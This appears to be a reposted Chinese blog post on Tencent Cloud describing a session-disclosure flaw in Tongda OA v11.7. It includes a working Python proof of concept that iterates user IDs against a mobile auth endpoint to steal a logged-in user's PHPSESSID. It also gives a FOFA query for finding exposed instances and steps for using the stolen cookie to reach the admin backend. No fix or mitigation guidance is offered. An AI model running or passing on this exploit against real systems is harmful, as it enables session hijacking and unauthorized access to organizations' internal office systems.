通达OA v11.7 在线用户登录漏洞
前言
通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统
poc
此poc来源于网络(通过遍历uid的值,判断用户是否上线过,实现任意用户登录
import requests
from bs4 import BeautifulSoup
import sys
import re
url = sys.argv[1]
for i in range(1,10000):
try :
vuln_url = url + "/mobile/auth_mobi.php?isAvatar=1&uid="+str(i)+"&P_VER=0"
resp = requests.get(vuln_url)
soup = BeautifulSoup(resp.text,'html.parser')
if 'RELOGIN' in soup.get_text():
print("不存在")
else:
PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(resp.headers))
print('uid='+str(i)+"在线"+"对应的COOKIE值是:PHPSESSID="+str(PHPSESSION[0]))
break
except:
break操作过程
fofa语法:app="TDXK-通达OA"
①.判断是否为在线用户(批量
http://xxx.xx.xx.xx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
如果页面是空白的即为管理员在线可利用;反之RELOGIN即为下线状态无法利用
②.获取其cookie
③.此时访问 http://xxx.xx.xx.xx/general/ 即可登录后台
效果图
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-04-14,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号